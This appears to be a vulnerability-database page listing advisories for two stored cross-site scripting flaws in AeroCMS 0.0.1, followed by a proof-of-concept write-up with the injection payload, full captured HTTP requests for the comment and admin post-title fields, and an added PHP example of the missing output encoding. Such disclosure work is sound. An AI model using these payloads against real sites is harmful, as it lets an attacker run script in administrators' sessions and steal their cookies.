| Title | Published | Views | Reporter |
|---|---|---|---|
| AeroCMS 0.0.1 Cross Site Scripting Vulnerability | 8 Apr 2022 00:00 | – | zdt |
| CVE-2022-27063 | 8 Apr 2022 09:15 | – | attackerkb |
| CVE-2022-27062 | 8 Apr 2022 09:15 | – | attackerkb |
| CVE-2022-27062 | 8 Apr 2022 12:38 | – | circl |
| CVE-2022-27063 | 8 Apr 2022 12:38 | – | circl |
| AeroCMS Cross-Site Scripting Vulnerability | 8 Apr 2022 00:00 | – | cnnvd |
| AeroCMS Cross-Site Scripting Vulnerability | 8 Apr 2022 00:00 | – | cnnvd |
| AeroCMS Cross-Site Scripting Vulnerability (CNVD-2022-30784) | 14 Apr 2022 00:00 | – | cnvd |
| AeroCMS Cross-Site Scripting Vulnerability | 14 Apr 2022 00:00 | – | cnvd |
| CVE-2022-27062 | 8 Apr 2022 08:23 | – | cve |

`# AeroCMS-Comment-Stored_XSS-POC
# Author: D4rkP0w4r
* Note => No registration or login is required
* Description => Stored_XSS at comment box
## Steps to Reproduce
* Click Read More -> enter the payload <img/src/onerror=prompt(10)> in the Author field -> click the Submit button
# Exploit
* Enter the payload in the Author field -> click the Submit button
* When an admin logs in to the admin panel and clicks Comments -> the XSS triggers
* Finally, success!
# Vulnerable Code
* view_all_comments.php
* Stored XSS in the comment section
* Impact: the attacker can obtain the cookie and execute JavaScript in the admin panel
* This is because comments are displayed in the admin panel
* post.php
* No encoding is applied when inserting data into the database
# POC
* Injection Point
```
comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=
```
* Request
```
POST /AeroCMS/post.php?p_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=
```
POC VIDEO https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing
----
# AeroCMS-Add_Posts-Stored_XSS-Poc
* Description => Stored_XSS at Post Title
## Steps to Reproduce
* Log in to the admin panel -> Posts -> Add Posts -> Post Title -> inject the payload <img/src/onerror=prompt(10)> -> the XSS triggers when the Edit Post button is clicked
## Vulnerable Code
* add_post.php
When inserting into the database, HTML characters are not filtered out of the input
* post.php
When the value is displayed, it is not properly entity-encoded either
-------------------------------------------------------------
# POC
* Injection Point
```
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
```
* Request
```
POST http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291
Content-Length: 1101
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26
Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2
Upgrade-Insecure-Requests: 1

-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_user"

admin
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_status"

published
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_tags"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_content"

<p>111</p>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="update_post"

Edit Post
-----------------------------85448121341942511952219062291--
```
POC VIDEO
https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing
`
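
Both findings above share one root cause: stored values are written into HTML without output encoding. The PHP below is an added illustration, not AeroCMS source and not part of the original write-up; the row keys reuse the form field names from the captured comment request, and `render_row_unsafe`, `render_row_safe` and `html_escape` are hypothetical names.

```php
<?php
// Added illustration; NOT AeroCMS source. Row keys reuse the form field
// names from the captured request; all function names are hypothetical.

// Constructed sample row, as it would come back from the database after the
// comment request stored the author field verbatim.
$row = [
    'comment_author'  => '<img/src/onerror=prompt(10)>',
    'comment_email'   => 'bin@gmail.com',
    'comment_content' => 'hacked',
];

// The pattern the write-up describes: stored values concatenated into HTML.
function render_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['comment_author'] . '</td><td>'
         . $row['comment_email'] . '</td><td>'
         . $row['comment_content'] . '</td></tr>';
}

// HTML-context encoder. ENT_QUOTES encodes both quote styles, so the result
// is also safe inside a quoted attribute; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: every database value is encoded at the point of output,
// regardless of what was (or was not) filtered when it was inserted.
function render_row_safe(array $row): string
{
    return '<tr><td>' . html_escape($row['comment_author']) . '</td><td>'
         . html_escape($row['comment_email']) . '</td><td>'
         . html_escape($row['comment_content']) . '</td></tr>';
}

$unsafe = render_row_unsafe($row);
$safe   = render_row_safe($row);

// Check whether a live <img tag survives in each rendering.
var_dump(strpos($unsafe, '<img') !== false);
var_dump(strpos($safe, '<img') === false);
echo $safe, PHP_EOL;
```

The same encoding applies wherever the post title is echoed back, including the edit form in the admin panel.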